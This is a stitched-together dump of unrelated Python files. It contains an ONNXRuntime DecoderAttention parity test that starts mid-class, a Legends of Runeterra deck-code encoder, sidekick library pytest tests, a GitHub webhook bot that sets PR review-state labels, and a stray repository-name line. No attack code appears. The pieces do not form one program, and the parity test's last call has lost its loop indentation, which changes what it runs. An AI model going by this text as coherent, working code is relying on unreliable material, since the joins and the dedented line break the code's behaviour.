        # K/V projections are TorchScript-compiled (cache-handling control flow).
        self.k_v_proj = torch.jit.script(AttentionProjection(num_heads, self.head_dim, embed_dim, bias))
        self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.cache_key = "encoder_decoder" if self.encoder_decoder_attention else "self"

    def _shape(self, tensor, seq_len, bsz):
        # (seq, batch, embed) -> (batch*heads, seq, head_dim)
        return tensor.contiguous().view(seq_len, bsz * self.num_heads, self.head_dim).transpose(0, 1)

    def forward(
        self,
        query,
        key: Tensor,
        key_padding_mask: Optional[Tensor] = None,
        layer_state: Optional[List[Tensor]] = None,
        attn_mask: Optional[Tensor] = None,
        output_attentions: bool=False,
        use_past=torch.tensor(False),
        has_key_padding_mask: bool=False
    ) -> Tuple[Tensor, Optional[Tensor]]:
        """Input shape: Time(SeqLen) x Batch x Channel"""
        static_kv: bool = self.encoder_decoder_attention
        tgt_len, bsz, embed_dim = query.size()
        # get here for encoder decoder cause of static_kv
        k, v = self.k_v_proj(query, key, layer_state, self.encoder_decoder_attention, use_past)
        q = self.q_proj(query) * self.scaling
        q = self._shape(q, tgt_len, bsz)

        # Update cache.
        # NOTE(review): new_key_cache/new_value_cache are only bound inside this
        # branch, so callers must always pass layer_state or the final return
        # raises UnboundLocalError — confirm that is the intended contract.
        if layer_state is not None:
            cached_shape = (bsz, self.num_heads, -1, self.head_dim) # bsz must be first for reorder_cache
            if static_kv:
                # cross-attn
                new_key_cache = k.view(*cached_shape)
                new_value_cache = v.view(*cached_shape)
            else:
                # self-attn
                new_key_cache = k.view(*cached_shape)
                new_value_cache = v.view(*cached_shape)

        src_len = k.size(1)
        assert key_padding_mask is None or key_padding_mask.shape == (bsz, src_len)
        attn_weights = torch.bmm(q, k.transpose(1, 2))
        assert attn_weights.size() == (bsz * self.num_heads, tgt_len, src_len)

        if has_key_padding_mask:  # don't attend to padding symbols
            attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
            reshaped = key_padding_mask.unsqueeze(1).unsqueeze(2)
            attn_weights = attn_weights.masked_fill(reshaped, float("-inf"))
            attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)

        attn_weights = F.softmax(attn_weights, dim=-1)
        # No dropout applied here: probabilities are used directly so results
        # stay comparable with the ORT kernel.
        attn_probs = attn_weights

        assert v is not None
        attn_output = torch.bmm(attn_probs, v)
        assert attn_output.size() == (bsz * self.num_heads, tgt_len, self.head_dim)
        attn_output = attn_output.transpose(0, 1).contiguous().view(tgt_len, bsz, embed_dim)
        attn_output = self.out_proj(attn_output)

        return attn_output, new_key_cache, new_value_cache

    def ORT_forward(
        self,
        query,
        key: Tensor,
        key_padding_mask: Optional[Tensor] = None,
        layer_state: Optional[List[Tensor]] = None,
        attn_mask: Optional[Tensor] = None,
        output_attentions: bool=False,
        use_past=torch.tensor(False),
        has_key_padding_mask: bool=False
    ) -> Tuple[Tensor, Optional[Tensor]]:
        """Input shape: Time(SeqLen) x Batch x Channel.

        Runs the same attention through the ONNXRuntime ``DecoderAttention``
        contrib op; only the output projection still runs in PyTorch.
        """
        # For readability
        static_kv = True if self.encoder_decoder_attention else False
        has_layer_state = True if layer_state is not None else False
        use_past_cache = True if use_past else False

        # Fuse the q/k/v projection weights into the layouts the ORT
        # DecoderAttention op expects: q alone, k/v interleaved, biases stacked.
        q_weight = self.q_proj.weight.transpose(0,1)
        q_weight = q_weight.reshape(self.embed_dim, self.embed_dim)

        kv_weight = torch.stack((self.k_v_proj.k_proj.weight.transpose(0,1), self.k_v_proj.v_proj.weight.transpose(0,1)), dim=1)
        kv_weight = kv_weight.reshape(self.embed_dim, 2 * self.embed_dim)

        bias = torch.stack((self.q_proj.bias, self.k_v_proj.k_proj.bias, self.k_v_proj.v_proj.bias), dim=0)
        bias = bias.reshape(3 * self.embed_dim)

        onnx_model_str = create_decoder_attention_graph(query, key, q_weight, kv_weight, bias, self.num_heads, static_kv, use_past_cache, has_layer_state, has_key_padding_mask)

        # Pick the relevant half of the 4-tensor cache list.
        self_p_k, self_p_v, enc_dec_p_k, enc_dec_p_v = layer_state
        if self.encoder_decoder_attention:
            key_cache, value_cache = enc_dec_p_k, enc_dec_p_v
        else:
            key_cache, value_cache = self_p_k, self_p_v

        ort_inputs = {
            'query': numpy.ascontiguousarray(query.cpu().numpy()),
            'key': numpy.ascontiguousarray(key.cpu().numpy()),
            'key_padding_mask': numpy.ascontiguousarray(key_padding_mask.cpu().numpy()),
            'key_cache': numpy.ascontiguousarray(key_cache.detach().cpu().numpy()),
            'value_cache': numpy.ascontiguousarray(value_cache.detach().cpu().numpy())
        }

        from onnxruntime import SessionOptions, InferenceSession
        sess_options = SessionOptions()
        ort_session = InferenceSession(onnx_model_str, sess_options, providers=['CUDAExecutionProvider'])
        ort_output = ort_session.run(None, ort_inputs)
        output, new_key_cache, new_value_cache = ort_output

        output = torch.tensor(output)
        # Output projection still runs in PyTorch; only the attention core is ORT.
        attn_output = self.out_proj(output)

        return attn_output, torch.tensor(new_key_cache), torch.tensor(new_value_cache)
def create_decoder_attention_graph(query, key, q_weight, kv_weight, bias, num_heads_, static_kv, use_past, has_layer_state, has_key_padding_mask):
    """Build a one-node ONNX graph wrapping the com.microsoft DecoderAttention op.

    Tensor shapes are taken from the example ``query``/``key`` tensors, the
    fused weights/biases and boolean mode flags are baked in as initializers.
    Returns the serialized ONNX model bytes.
    """
    from onnx import helper, TensorProto

    # S = target length, B = batch, NH = embed dim, S2 = source length,
    # N = heads, H = per-head size.
    S, B, NH = query.size()
    S2 = key.size()[0]
    N = num_heads_
    H = int(NH / N)

    nodes = [
        helper.make_node("DecoderAttention",
                         ["query", "key", "q_weight", "kv_weight", "bias", "key_padding_mask", "key_cache", "value_cache", "static_kv", "use_past", "has_layer_state", "has_key_padding_mask"],
                         ["output", "new_key_cache", "new_value_cache"],
                         "DecoderAttention_0",
                         num_heads=num_heads_,
                         domain="com.microsoft"),
    ]

    initializers = [
        helper.make_tensor('q_weight', TensorProto.FLOAT, [NH, NH],
                           q_weight.flatten().tolist()),
        helper.make_tensor('kv_weight', TensorProto.FLOAT, [NH, 2 * NH],
                           kv_weight.flatten().tolist()),
        helper.make_tensor('bias', TensorProto.FLOAT, [3 * NH],
                           bias.flatten().tolist()),
        helper.make_tensor('static_kv', TensorProto.BOOL, [1],
                           [static_kv]),
        helper.make_tensor('use_past', TensorProto.BOOL, [1],
                           [use_past]),
        helper.make_tensor('has_layer_state', TensorProto.BOOL, [1],
                           [has_layer_state]),
        helper.make_tensor('has_key_padding_mask', TensorProto.BOOL, [1],
                           [has_key_padding_mask]),
    ]

    # Mask and cache lengths are symbolic so the same graph serves both the
    # fresh and the use-past configurations.
    graph = helper.make_graph(nodes, "DecoderAttention_Graph", [
        helper.make_tensor_value_info('query', TensorProto.FLOAT, [S, B, NH]),
        helper.make_tensor_value_info('key', TensorProto.FLOAT, [S2, B, NH]),
        helper.make_tensor_value_info('key_padding_mask', TensorProto.BOOL, [B, "mask_len"]),
        helper.make_tensor_value_info('key_cache', TensorProto.FLOAT, [B, N, "cache_len", H]),
        helper.make_tensor_value_info('value_cache', TensorProto.FLOAT, [B, N, "cache_len", H]),
    ], [
        helper.make_tensor_value_info('output', TensorProto.FLOAT, [S, B, NH]),
        helper.make_tensor_value_info('new_key_cache', TensorProto.FLOAT, [B, N, "new_cache_len", H]),
        helper.make_tensor_value_info('new_value_cache', TensorProto.FLOAT, [B, N, "new_cache_len", H]),
    ], initializers)

    model = helper.make_model(graph)
    return model.SerializeToString()
def create_inputs(config: Config, has_layer_state: bool, use_past: bool, encoder_decoder_attention: bool):
    """Generate random query/key/mask/cache tensors for one parity-test case."""
    def _noise(*dims):
        # Small-magnitude Gaussian noise; called in the same order (query,
        # key, mask, cache) as before so RNG draws are unchanged.
        return torch.normal(mean=0.0, std=0.1, size=dims)

    query = _noise(config.sequence_length,
                   config.batch_size,
                   config.embed_dim).to(torch.float32)
    key = _noise(config.kv_sequence_length,
                 config.batch_size,
                 config.embed_dim).to(torch.float32)

    # Effective key length depends on attention type and cache usage:
    # cross-attention always sees the encoder sequence; cached self-attention
    # sees past + current steps.
    if encoder_decoder_attention:
        key_length = config.kv_sequence_length
    elif has_layer_state and use_past:
        key_length = config.sequence_length + config.kv_sequence_length
    else:
        key_length = config.sequence_length

    key_padding_mask = _noise(config.batch_size, key_length) > 0
    # The following line ensures not all of the mask is true.
    key_padding_mask[0][0] = False

    cache = _noise(config.batch_size,
                   config.num_heads,
                   config.kv_sequence_length,
                   config.head_size).to(torch.float32)
    layer_state = [cache, cache, cache, cache]

    return query, key, key_padding_mask, layer_state, torch.tensor(use_past)
def parity_check(config, has_layer_state, use_past, static_kv, has_key_padding_mask, rtol=1e-4, atol=1e-4):
    """Compare the PyTorch reference attention with the ORT DecoderAttention op."""
    query, key, key_padding_mask, layer_state, use_past = create_inputs(
        config, has_layer_state, use_past, static_kv)
    attn = AttentionForONNX(config.embed_dim,
                            config.num_heads,
                            encoder_decoder_attention=static_kv)

    args = (query, key, key_padding_mask, layer_state, None, False, use_past, has_key_padding_mask)
    torch_out, torch_key, torch_value = attn.forward(*args)
    ort_out, ort_key, ort_value = attn.ORT_forward(*args)
    # A second ORT run checks the op is deterministic ("randomness" column).
    ort_out_again, _, _ = attn.ORT_forward(*args)

    def close(a, b):
        return numpy.allclose(a.detach().numpy(), b.detach().numpy(),
                              rtol=rtol, atol=atol, equal_nan=True)

    print(" B:", config.batch_size,
          " S:", config.sequence_length,
          " S*:", config.kv_sequence_length,
          " h:", config.embed_dim,
          " has_layer_state:", has_layer_state,
          " use_past:", use_past,
          " static_kv:", static_kv,
          " has_key_padding_mask:", has_key_padding_mask,
          "[attn_output, randomness, key, value] parity:",
          close(torch_out, ort_out),
          close(ort_out_again, ort_out),
          close(torch_key, ort_key),
          close(torch_value, ort_value))
if __name__ == '__main__':
    # Sweep batch size (b), target length (s), source length (s2), head count
    # (n) and head size (h), and run the torch-vs-ONNXRuntime parity check for
    # every combination of cache usage, attention type (static_kv=True is
    # cross-attention) and key-padding-mask flags.
    for b in [1, 32, 128]:
        for s in [1, 2, 128]:
            for s2 in [1, 64, 256]:
                for n in [8]:
                    for h in [64]:
                        config = Config(b, s, s2, n, h)
                        parity_check(config, has_layer_state = True, use_past = True, static_kv = True, has_key_padding_mask = False)
                        parity_check(config, has_layer_state = True, use_past = True, static_kv = False, has_key_padding_mask = False)
                        parity_check(config, has_layer_state = True, use_past = False, static_kv = True, has_key_padding_mask = False)
                        parity_check(config, has_layer_state = True, use_past = False, static_kv = False, has_key_padding_mask = False)
                        parity_check(config, has_layer_state = True, use_past = True, static_kv = True, has_key_padding_mask = True)
                        parity_check(config, has_layer_state = True, use_past = True, static_kv = False, has_key_padding_mask = True)
                        parity_check(config, has_layer_state = True, use_past = False, static_kv = True, has_key_padding_mask = True)
parity_check(config, has_layer_state = True, use_past = False, static_kv = False, has_key_padding_mask = True) |
# Credit to @stelar7, this python implementation is a port of his original javascript implementation
from base64 import b32decode, b32encode
from io import BytesIO
MAX_KNOWN_VERSION = 20
class Base32:
    """Thin wrappers around base64.b32encode/b32decode that tolerate missing padding."""

    @staticmethod
    def decode(b32string):
        """Decode a (possibly unpadded) base32 string into bytes."""
        return b32decode(Base32.add_padding(b32string))

    @staticmethod
    def encode(bytes_list):
        """Encode an iterable of byte values into an unpadded base32 string."""
        return str(b32encode(bytes(bytes_list)), "utf-8").strip("=")

    @staticmethod
    def add_padding(b32String):
        """Pad a base32 string with '=' to a multiple of 8 characters.

        Python's builtin decoder is strict about padding.
        """
        remainder = len(b32String) % 8
        if remainder:
            b32String += "=" * (8 - remainder)
        return b32String
# Mapping between two-letter faction codes and their numeric deck-code ids.
faction_code_to_id = {
    "DE": 0,
    "FR": 1,
    "IO": 2,
    "NX": 3,
    "PZ": 4,
    "SI": 5,
    "BW": 6,
    "SH": 7,
    "BC": 10,
    "MT": 9,
}

# Inverse lookup, derived from the table above so the two can never drift apart.
id_to_faction_code = {num: code for code, num in faction_code_to_id.items()}
class DeckCode:
    """Encodes and decodes Legends of Runeterra deck codes."""

    @staticmethod
    def encode_deck(deck):
        """Encode a {card_code: count} mapping into a base32 deck-code string."""
        result = [17]  # format (1) and version (1) packed into one byte
        # Remove non-collectible / malformed entries before validating.
        deck = DeckCode.remove_invalid_cards(deck)
        if not DeckCode.is_valid_card_codes_and_count(deck):
            raise Exception("Deck contains invalid card codes")

        cards_3, cards_2, cards_1, cards_other = [], [], [], []
        for card, count in deck.items():
            if count == 3:
                cards_3.append(card)
            elif count == 2:
                cards_2.append(card)
            elif count == 1:
                cards_1.append(card)
            else:
                cards_other.append((card, count))

        # 3-of, 2-of and 1-of cards are grouped by (set, faction) and the
        # groups sorted by ascending size before encoding.
        for bucket in (cards_3, cards_2, cards_1):
            grouped = DeckCode.sort_card_groups(DeckCode.group_by_faction(bucket))
            result.extend(VarIntTransformer.encodeGroupOf(grouped))
        # Any other count (4+) goes into the trailing n-of section.
        result.extend(VarIntTransformer.encodeNOfs(sorted(cards_other)))
        return Base32.encode(result)

    @staticmethod
    def group_by_faction(card_list):
        """Partition card codes into sorted groups sharing the same set and faction.

        Note: consumes (empties) ``card_list`` as it goes.
        """
        new_list = []
        while len(card_list) > 0:
            card = card_list.pop(0)
            set_num, faction, _ = DeckCode.parse_card_code(card)
            faction_set = [card]
            # Iterate over a snapshot so removal from card_list is safe.
            for other in card_list[:]:
                other_set, other_faction, _ = DeckCode.parse_card_code(other)
                if other_set == set_num and other_faction == faction:
                    faction_set.append(other)
                    card_list.remove(other)
            faction_set.sort()
            new_list.append(faction_set)
        return new_list

    @staticmethod
    def sort_card_groups(card_groups):
        """Sort card groups by ascending group size (stable sort)."""
        return sorted(card_groups, key=lambda group: len(group))

    @staticmethod
    def parse_card_code(card_code):
        """Split a 7-character card code into (set, faction, card_id) strings."""
        return card_code[:2], card_code[2:4], card_code[4:]

    @staticmethod
    def _card_error(code, count):
        """Return a message describing why (code, count) is invalid, else None."""
        if len(code) != 7:
            return f"deck code length is {len(code)}"
        # Set code must be numeric.
        for char in code[:2]:
            if not char.isdigit():
                return f"code is not digit: {char}"
        if faction_code_to_id.get(code[2:4], -1) < 0:
            return f"faction code not in faction code list: {code[2:4]}"
        for char in code[4:]:
            if not char.isdigit():
                return f"card number contains non digit: {char}"
        if count < 1:
            # BUG FIX: message was a plain string, so {count} never expanded.
            return f"less than one card: {count}"
        return None

    @staticmethod
    def is_valid_card_codes_and_count(deck):
        """Return True when every (card, count) entry in the deck is valid."""
        for card, count in deck.items():
            error = DeckCode._card_error(card, count)
            if error is not None:
                print(error)
                return False
        return True

    @staticmethod
    def remove_invalid_cards(deck):
        """Return a copy of ``deck`` with invalid entries removed.

        BUG FIX: the old implementation could ``del`` the same key twice when
        a code contained more than one bad character (the ``continue`` only
        advanced the inner character loop), raising KeyError. Building a new
        dict with one validity decision per card avoids that entirely.
        """
        new_deck = {}
        for card, count in deck.items():
            error = DeckCode._card_error(card, count)
            if error is not None:
                print(f"remove_invalid_cards {error}")
            else:
                new_deck[card] = count
        return new_deck

    @staticmethod
    def decode_deck(string):
        """Decode a base32 deck-code string into a {card_code: count} mapping."""
        result = {}
        data = Base32.decode(string)
        byte_list = BytesIO(data)
        version = VarIntTransformer.popVarInt(byte_list)
        if version > MAX_KNOWN_VERSION:
            raise ValueError("Please update to the latest version of twisted_fate")

        # Standard groups: 3-of cards first, then 2-of, then 1-of.
        for i in range(3, 0, -1):
            num_groups = VarIntTransformer.popVarInt(byte_list)
            for _ in range(num_groups):
                num_in_group = VarIntTransformer.popVarInt(byte_list)
                set_num = VarIntTransformer.popVarInt(byte_list)
                faction = VarIntTransformer.popVarInt(byte_list)
                for _ in range(num_in_group):
                    card = VarIntTransformer.popVarInt(byte_list)
                    card_code = (str(set_num).zfill(2)
                                 + id_to_faction_code[faction]
                                 + str(card).zfill(3))
                    result[card_code] = i

        # Trailing section: cards with any other count, one full record each.
        # BUG FIX: the old condition `len(bytearray(byte_list))` raised
        # TypeError (bytearray cannot wrap a BytesIO); compare the stream
        # position against the buffer length instead.
        while byte_list.tell() < len(data):
            fpc = VarIntTransformer.popVarInt(byte_list)
            fps = VarIntTransformer.popVarInt(byte_list)
            fpf = VarIntTransformer.popVarInt(byte_list)
            fpn = VarIntTransformer.popVarInt(byte_list)
            card_code = str(fps).zfill(2) + id_to_faction_code[fpf] + str(fpn).zfill(3)
            result[card_code] = fpc
        return result
class VarIntTransformer:
    """LEB128-style variable-length integer encoding used by deck codes."""

    @staticmethod
    def popVarInt(stream):
        """Read one varint from a byte stream; raises EOFError on truncation."""
        result = 0
        shift = 0
        while True:
            chunk = stream.read(1)
            if not chunk:
                raise EOFError("Unexpected EOF while reading varint")
            byte = ord(chunk)
            result |= (byte & 0x7f) << shift
            if not (byte & 0x80):
                return result
            shift += 7

    @staticmethod
    def getVarInt(value):
        """Encode an integer (or numeric string) as a list of varint bytes."""
        value = int(value)
        if value == 0:
            return [0]
        out = []
        while value != 0:
            # Low 7 bits, with the MSB set when more bytes follow.
            byte_val = value & 0x7F
            value >>= 7
            if value != 0:
                byte_val |= 0x80
            out.append(byte_val)
        return out

    @staticmethod
    def encodeNOfs(nOfs):
        """Encode [(card_code, count), ...] records for the trailing n-of section."""
        out = []
        for card, count in nOfs:
            out.extend(VarIntTransformer.getVarInt(count))
            set_num, faction_code, card_num = DeckCode.parse_card_code(card)
            out.extend(VarIntTransformer.getVarInt(set_num))
            out.extend(VarIntTransformer.getVarInt(faction_code_to_id[faction_code]))
            out.extend(VarIntTransformer.getVarInt(card_num))
        return out

    @staticmethod
    def encodeGroupOf(groupOf):
        """Encode a list of (set, faction)-grouped card-code lists."""
        out = list(VarIntTransformer.getVarInt(len(groupOf)))
        for card_list in groupOf:
            out.extend(VarIntTransformer.getVarInt(len(card_list)))
            # Set and faction are shared by the whole group; take them from
            # the first card.
            set_num, faction_code, _ = DeckCode.parse_card_code(card_list[0])
            out.extend(VarIntTransformer.getVarInt(set_num))
            out.extend(VarIntTransformer.getVarInt(faction_code_to_id[faction_code]))
            for card in card_list:
                out.extend(VarIntTransformer.getVarInt(card[4:]))
        return out
import operator as op
import pytest
import sidekick.api as sk
from sidekick import X
from sidekick.seq.testing import VALUE, LL
class TestBasic:
    """Smoke tests for the basic sequence accessors."""

    def test_fail_with_empty_lists(self, empty):
        # Every accessor without a default must raise on an empty sequence.
        failing = [sk.uncons, sk.first, sk.second, sk.last, sk.nth(0), sk.nth(1)]
        for fn in failing:
            with pytest.raises(ValueError):
                print("not failed:", fn, fn(empty()))

    def test_succeed_with_empty_lists(self, empty):
        # Accessors with defaults (and predicates) must tolerate empty input.
        cases = {
            sk.cons(1): LL(1),
            sk.uncons(default=VALUE): (VALUE, LL()),
            sk.first(default=VALUE): VALUE,
            sk.second(default=VALUE): VALUE,
            sk.last(default=VALUE): VALUE,
            sk.nth(0, default=VALUE): VALUE,
            sk.nth(5, default=VALUE): VALUE,
            sk.only(default=VALUE): VALUE,
            sk.last(n=2, default=None): (None, None),
            sk.is_empty: True,
            sk.length: 0,
        }
        for fn, expected in cases.items():
            assert fn(empty()) == expected

    def test_succeed_with_seq_of_numbers(self, nums):
        cases = {
            sk.cons(0): LL(0, 1, 2, 3, 4, 5),
            sk.uncons: (1, LL(2, 3, 4, 5)),
            sk.first: 1,
            sk.second: 2,
            sk.last: 5,
            sk.nth(0): 1,
            sk.nth(2): 3,
            sk.nth(5, default=VALUE): VALUE,
            sk.last(n=2): (4, 5),
            sk.is_empty: False,
            sk.length: 5,
            sk.length(limit=2): 2,
        }
        for fn, expected in cases.items():
            assert fn(nums()) == expected

    def test_fail_seq_of_numbers(self, nums):
        # Out-of-range nth without a default must raise.
        for fn in (sk.nth(5), sk.nth(10)):
            with pytest.raises(ValueError):
                result = fn(nums())
                print("not failed:", fn, result)

    def test_only(self):
        # `only` returns the sole element, or the default on empty input,
        # and raises for zero or more than one element.
        assert sk.only([42]) == 42
        assert sk.only([], default=42) == 42
        with pytest.raises(ValueError):
            sk.only([])
        with pytest.raises(ValueError):
            sk.only([1, 2])
class TestCreation:
    """Tests for sequence-constructing functions (unfold, nums, iterate)."""

    def test_unfold(self):
        # unfold stops when the seed function returns None; each step yields
        # (next_seed, value).
        assert sk.unfold(lambda x: None if x > 10 else (2 * x, x), 1) == LL(1, 2, 4, 8)

    def test_nums(self):
        # nums() extrapolates arithmetic progressions; Ellipsis marks an
        # infinite tail in both the call and the expected LL.
        assert sk.nums() == LL(0, 1, 2, 3, 4, ...)
        assert sk.nums(1) == LL(1, 2, 3, 4, 5, ...)
        assert sk.nums(1, ...) == LL(1, 2, 3, 4, 5, ...)
        assert sk.nums(1, 2, ...) == LL(1, 2, 3, 4, 5, ...)
        assert sk.nums(1, 3, ...) == LL(1, 3, 5, 7, 9, ...)
        assert sk.nums(1, 2, 3, 5, ...) == LL(1, 2, 3, 5, 7, 9, ...)

    def test_iterate(self):
        # Test special cases for 0, 1, 2, 3, and more past values
        fn = lambda *args: sum(args)
        assert sk.iterate((X + 1), 1) == LL(1, 2, 3, ...)
        assert sk.iterate(fn, 1, 1) == LL(1, 1, 2, 3, 5, 8, ...)
        assert sk.iterate(fn, 1, 3) == LL(1, 3, 4, 7, 11, ...)
        assert sk.iterate(fn, 1, 1, 1) == LL(1, 1, 1, 3, 5, 9, 17, ...)
        assert sk.iterate(fn, 1, 1, 1, 1) == LL(1, 1, 1, 1, 4, 7, 13, 25, ...)
        # index=1 feeds the position alongside the previous value.
        assert sk.iterate(op.mul, 1, index=1) == LL(1, 1, 2, 6, 24, 120, ...)
        assert sk.iterate(fn, 1, index=sk.nums()) == LL(1, 1, 2, 4, 7, 11, 16, ...)
class TestHypothesis:
    """Placeholder for property-based (hypothesis-style) tests.

    All test bodies below are unfinished stubs.
    """

    # Registries presumably meant to map functions to strategies/predicates;
    # currently empty and unused — TODO confirm intended use.
    FN_PRED_SEQ = {}
    FN_SELECTOR = {}

    def test_functions_that_do_not_change_size_of_iterables(self):
        # TODO: implement.
        ...

    def test_functions_that_filter_iterables(self):
        # NOTE(review): this list is built but never asserted on — the test
        # body is unfinished. TODO: add property checks over these functions.
        filters = [
            sk.filter,
            sk.remove,
            sk.dedupe,
            sk.unique,
            sk.take,
            sk.rtake,
            sk.drop,
            sk.rdrop,
        ]

    def test_functions_that_filter_and_transform_iterables(self):
        # TODO: implement.
        ...
|
import os
import aiohttp
from aiohttp import web
from gidgethub import aiohttp as gh_aiohttp
from gidgethub import routing
from gidgethub import sansio
# Maps GitHub webhook event types/actions to handler coroutines.
router = routing.Router()
# aiohttp route table for the HTTP webhook endpoint.
routes = web.RouteTableDef()

# Login the bot posts under; commands are addressed as "@<BOT_NAME> <command>".
BOT_NAME = "marvin-mk2"

# secrets and configurations configured through the environment
WEBHOOK_SECRET = os.environ.get("WEBHOOK_SECRET")
GH_OAUTH_TOKEN = os.environ.get("GH_TOKEN")

# map commands to mutually exclusive labels
ISSUE_STATE_COMMANDS = {
    "needs review": "needs_review",
    "needs work": "needs_work",
    "needs merge": "needs_merge",
}

# Common tail appended to both greeting messages.
GREETING_FOOTER = f"""
Once a reviewer has looked at this, they can either
- request changes and instruct me to switch the state back (@{BOT_NAME} needs work)
- merge the PR if it looks good and they have the appropriate permission
- switch the state to `needs_merge` (@{BOT_NAME} needs merge), which allows reviewers with merge permission to focus their reviews
If anything could be improved, do not hesitate to give [feedback](https://github.com/timokau/marvin-mk2/issues).
""".rstrip()

# Posted when a new PR is initialized in the needs_work state.
GREETING_WORK = (
    f"""
Hi! I'm an experimental bot. My goal is to guide this PR through its stages, hopefully ending with a merge.
I have initialized the PR in the `needs_work` state. This indicates that the PR is not finished yet or that there are outstanding change requests. If you think the PR is good as-is, you can tell me to switch the state as follows:
@{BOT_NAME} needs review
This will change the state to `needs_review`, which makes it easily discoverable by reviewers.
""".strip()
    + GREETING_FOOTER
)

# Posted when a new PR is initialized in the needs_review state.
GREETING_REVIEW = (
    f"""
Hi! I'm an experimental bot. My goal is to guide this PR through its stages, hopefully ending with a merge.
I have initialized the PR in the `needs_review` state. This indicates that you consider this PR good to go and makes it easily discoverable by reviewers.
""".strip()
    + GREETING_FOOTER
)

# Fallback reply for unrecognized commands.
# NOTE(review): the f-prefix here is unnecessary (no placeholders).
UNKNOWN_COMMAND_TEXT = f"""
Sorry, I can't help you. Is there maybe a typo in your command?
""".strip()
# Unfortunately its not possible to directly listen for mentions
# https://github.com/dear-github/dear-github/issues/294
def find_commands(comment_text):
    r"""Filters a comment for commands.

    A command is any line starting with an "@<BOT_NAME>" mention; the text
    after the mention (stripped of surrounding whitespace) is the command.

    >>> find_commands("This is a comment without a command.")
    []
    >>> find_commands("This includes a command, but with the wrong mention.\n@marvin-mk3 command")
    []
    >>> find_commands("This includes a proper command.\n@marvin-mk2 command with multiple words")
    ['command with multiple words']
    >>> find_commands("@marvin-mk2 @marvin-mk2 test\n@marvin-mk3 asdf\n@marvin-mk2 another ")
    ['@marvin-mk2 test', 'another']
    """
    # The mention prefix is loop-invariant; build it once instead of
    # re-evaluating the f-string (twice) for every line.
    prefix = f"@{BOT_NAME}"
    return [
        line[len(prefix):].strip()
        for line in comment_text.splitlines()
        if line.startswith(prefix)
    ]
async def clear_state(issue, gh):
    """Remove any workflow-state label currently set on the issue."""
    present = {label["name"] for label in issue["labels"]}
    # Intersect with the known state labels; normally at most one is present,
    # but a set keeps this robust against duplicates.
    for state_label in present & set(ISSUE_STATE_COMMANDS.values()):
        await gh.delete(issue["url"] + "/labels/" + state_label)
async def handle_new_pr(pull_request, gh):
    """React to a newly opened PR (or issue, for easier testing).

    Executes at most the first command found in the body: a state command
    opts the PR in (adds the "marvin" label), sets the initial state label
    and posts the matching greeting; anything else gets the unknown-command
    reply.
    """
    comment_text = pull_request["body"]
    # If pull_request actually is a pull_request, we have to query issue_url.
    # If its an issue, we have to use "url".
    issue_url = pull_request.get("issue_url", pull_request["url"])
    add_labels_url = issue_url + "/labels"
    # The two initialization branches were duplicated except for the greeting
    # (and one of them rebuilt add_labels_url inline); unify them.
    greetings = {
        "needs work": GREETING_WORK,
        "needs review": GREETING_REVIEW,
    }
    # Only handle one command for now, since a command can modify the issue and
    # we'd need to keep track of that.
    for command in find_commands(comment_text)[:1]:
        if command in greetings:
            # Opt in to the bot, then set the initial state label, then greet.
            await gh.post(
                add_labels_url, data={"labels": ["marvin"]},
            )
            await gh.post(
                add_labels_url,
                data={"labels": [ISSUE_STATE_COMMANDS[command]]},
            )
            await gh.post(
                pull_request["comments_url"], data={"body": greetings[command]}
            )
        else:
            await gh.post(
                pull_request["comments_url"], data={"body": UNKNOWN_COMMAND_TEXT}
            )
async def handle_comment(comment, issue, gh):
    """React to a comment on an issue or PR.

    Ignores the bot's own comments and issues that have not opted in (no
    "marvin" label). Executes at most the first command in the comment.
    """
    comment_text = comment["body"]
    comment_author_login = comment["user"]["login"]
    # Never react to ourselves, or we could loop.
    if comment_author_login == BOT_NAME:
        return
    # check opt-in
    if "marvin" not in {label["name"] for label in issue["labels"]}:
        return
    # Only handle one command for now, since a command can modify the issue and
    # we'd need to keep track of that.
    for command in find_commands(comment_text)[:1]:
        if command == "echo":
            # comment_text was already read above; the original re-fetched it
            # redundantly here.
            reply_text = f"Echo!\n{comment_text}"
            await gh.post(issue["comments_url"], data={"body": reply_text})
        elif command == "agree with me":
            # https://developer.github.com/v3/reactions/#reaction-types For
            # some reason reactions have been in "beta" since 2016. We need to
            # opt in with the accept header.
            # https://developer.github.com/changes/2016-05-12-reactions-api-preview/
            await gh.post(
                comment["url"] + "/reactions",
                data={"content": "+1"},
                accept="application/vnd.github.squirrel-girl-preview+json",
            )
        elif command in ISSUE_STATE_COMMANDS:
            # Replace whatever state label is present with the requested one.
            await clear_state(issue, gh)
            await gh.post(
                issue["url"] + "/labels",
                data={"labels": [ISSUE_STATE_COMMANDS[command]]},
            )
        else:
            await gh.post(issue["comments_url"], data={"body": UNKNOWN_COMMAND_TEXT})
# Work on issues too for easier testing.
@router.register("issues", action="opened")
async def issue_open_event(event, gh, *args, **kwargs):
    """Webhook callback: treat a newly opened issue like a new PR."""
    await handle_new_pr(event.data["issue"], gh)
@router.register("issue_comment", action="created")
async def issue_comment_event(event, gh, *args, **kwargs):
    """Webhook callback: handle a new comment on an issue or PR."""
    await handle_comment(event.data["comment"], event.data["issue"], gh)
@router.register("pull_request_review_comment", action="created")
async def pull_request_review_comment_event(event, gh, *args, **kwargs):
    """Webhook callback: handle a new review comment on a pull request."""
    await handle_comment(event.data["comment"], event.data["pull_request"], gh)
@router.register("pull_request", action="opened")
async def pull_request_open_event(event, gh, *args, **kwargs):
    """Webhook callback: initialize a newly opened pull request."""
    await handle_new_pr(event.data["pull_request"], gh)
@routes.post("/")
async def main(request):
    """Webhook endpoint: verify, parse and dispatch one GitHub event."""
    payload = await request.read()
    # from_http validates the signature against WEBHOOK_SECRET.
    event = sansio.Event.from_http(request.headers, payload, secret=WEBHOOK_SECRET)
    async with aiohttp.ClientSession() as session:
        gh = gh_aiohttp.GitHubAPI(session, BOT_NAME, oauth_token=GH_OAUTH_TOKEN)
        # Hand the event to whichever handler(s) registered for it.
        await router.dispatch(event, gh)
    # Acknowledge receipt to GitHub.
    return web.Response(status=200)
if __name__ == "__main__":
    app = web.Application()
    app.add_routes(routes)
    # Deployment platforms (e.g. Heroku) provide the listen port via $PORT
    # as a string; None lets aiohttp fall back to its default port.
    port = os.environ.get("PORT")
    if port is not None:
        port = int(port)
    web.run_app(app, port=port)
|
<reponame>sidorenkov-v-a/polls
from rest_framework.reverse import reverse
